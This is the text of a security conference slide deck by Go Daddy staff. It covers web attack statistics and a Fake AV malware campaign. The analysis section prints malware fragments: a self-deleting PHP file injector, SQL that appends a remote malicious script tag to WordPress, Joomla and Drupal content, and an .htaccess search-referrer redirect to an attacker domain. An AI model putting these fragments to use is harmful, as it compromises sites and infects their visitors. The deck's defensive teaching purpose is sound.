KEEPING UP WITH THE WEB APPLICATION SECURITY

Ganesh Devarajan & Todd Redfoot

Introduction

Todd Redfoot Chief Information Security Officer

Ganesh Devarajan Sr. Security Architect

The Background

(What does Go Daddy do?)

What does Go Daddy do?

9.4 Million Customers 48 Million Domains Under Management Over 5 million Active Hosting Accounts 1/3 of all DNS queries run through our

servers We register, renew or transfer more

than one domain name every second

What does Go Daddy do?

40+ Security Professionals in Team 24 x 7 Operations Center Research Engineering Forensics Customer Security Advisors Penetration Testing User Administration Development

The Numbers

(What does Go Daddy see?)

What do we see?

Monitor over 100,000 events per second 8.6 Billion/Day

DDoS - ~900 Attacks per day / 6K per week Feb 2011 - Largest attack @ 21M pps Last Week – 40G Attack

Brute Force – 3.5M per hour

What do we see?

“Other” Attacks : 425K – Invalid Directory Traversal 90K – XSS Prevention 115K – SQL Injection Prevention

… all in a 24 hour period…

Current Trends

SSH Brute Forcers

US54%

CN20%

KR6%

BG4%

AR4% TW

3%FR2%

JP2%

CA2%

BR2%

SSH Brute Forcers

Englewood, Colorado140 Million attempts

MS-SQL Brute Forcers

US65%

CN24%

TR5%

CA2%

-1%

KR1%

TH1%

RU0%

VN0%

IE0%

MS-SQL Brute Forcers

Orlando, FL348 Million attempts

My-SQL Brute Forcers

US78%

CN12%

CA4%

SE2%

FR2%

MY1%

PH1%

IN0%

JP0%

KR0%

My-SQL Brute Forcers

FTP Brute Forcers

CN66%

US26%

HK2%

CA2%IE

2%TW1%

KR1%

RS0%

DE0%

BR0%

FTP Brute Forcers

XingPing, CN12 Million attempts

Brute Forcers - All

US61%

CN27%

TR4%KR

2%CA2%-

1%BG1%

TH1%

AR1%

TW1%

Brute Forcers - US

Garden City, NY75.7 Million attempts

Brute Forcers - CN

Datong, CN22.5 Million attempts

Brute Forcinator

SQL Injection

US41%

CN28%

BG9%

UK5%

ID4%NL

4%CZ3%JP

3%AU2%

FR2%

SQL Injection

Seattle, WA1.3 Million attempts

Backdoor Shells

US87%

ID4%

NG2%UK

2%CN1%

CA1%

DE1%

BR1%

NL1%

AL0%

Backdoor Shells

Phone Company (91%)Mountain View, CA

PHP AttacksUS

65%

KR8%

FR6%

RU4%DE

3%LU3%UK

3%BR3%

CA2%

NL2%

PHP Attacks

Berlin, Germany1.9 Million attempts

PHP Attacks

Montreal, CA1.1 Million attempts

Botnet

US52%

UK7%

KR6%

PL6%

FR6%

DE6%

CA6%

RU5%

NL4%

AU3%

Botnet

Botnet

Source - https://zeustracker.abuse.ch/

Botnet

Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps

Phishing

The Good, Bad and Ugly?

The Bad – Most Events

The Ugly – Security Events & DDoS

New Trends

Recent Changes

“Hacktivists” Lulzsec = Twitter ComodoHacker = Pastebin

Phishing -> Spear Phishing Targeted & Coordinated Attacks

RSA / Lockheed Martin Connection

What’s in the News?

More Client-side Exploits Browser exploits Adobe exploits

Web Server Compromises Brute Force Attacks Leveraging Web Application Vulnerabilities Config files with passwords

More of the same…

Scareware Reports fake viruses to users Asks for fee to remove the threat

Paying does nothing but give them your CC# $10 Million in Revenue last year

Fake AV

Fake AV Analysis

$$$$$$

<html>Holy Crap! Infected! Click Here to clean</html>

GET http://intermediary.com/ll.php

Make HTTP calls to infection script and site is infected

Compromised Attack Server(s)

Servers with Compromised Accounts(Zeus/Phishing/etc)

FTP/SSH Upload of Attack Shell/Script

Casual Web User Visits Infected Site

End Users

Fake AV Basterds

<script>http://intermediary.com/ll.php</script>

Disposable Domain Name

Registrant:Hilary Kneber hilarykneber@yahoo.com7569468 fax: 756946829/2 Sun street. Montey 29Virginia NA 3947

Fake AV – Attack Breakdown

$z=$_SERVER["DOCUMENT_ROOT"];$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';@unlink($_SERVER['SCRIPT_FILENAME']);$val=$z;$totalinjected=0;echo "Working with $val\n!!STARTING!!";ob_flush();$start_time=microtime(true);if ($val!="")do_folder($val);$end_time=microtime(true)-$start_time;echo "|Injected| $totalinjected files in $end_time seconds\n";

Fake AV – Sample Shell

…

$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';

...

$link=mysql_connect($host,$user,$pass);

if (!$link) {

die('Could not connect: ' . mysql_error());

}else{

echo 'Connected successfully'."\n";

$db_list = mysql_list_dbs($link);

$bases = array();

while ($row = mysql_fetch_object($db_list)) {

$bases[]=$row->Database;

}

…

//wordpress

if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }

//joomla

if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; }

//drupal

if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; }

if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }

Fake AV – DB Variant

Fake AV - Search Redirect<IfModule mod_rewrite.c>RewriteEngine OnRewriteOptions inheritRewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]</IfModule>

addhandler x-httpd-php-cgi .php4addhandler x-httpd-php5-cgi .php5addhandler x-httpd-php5-cgi .php

Custom Monitoring

UDP Flooder

How to Protect?

Website Vulnerability Scanners Website Protection -Site Scanner

($48/Year) Beyond Security($99.95/Year) McAfee SecureTM (~$2100/Year) WhiteHat Security® IBM AppScan® Cenzic® HP WebInspect®

Web Based Malware Detection Virtual machine Honey pots

Monitor Creation of new Processes, File system or Registry entries, etc.

Browser Emulation Reputation Service

Internet’s black list Signature Based Detection/Prevention

Intrusion Detection System/Intrusion Prevention System

Anti-Virus

New Methodologies

Questions?

Thank You

Ganesh Devarajan gdevarajan@godaddy.com

Todd Redfoot todd@godaddy.com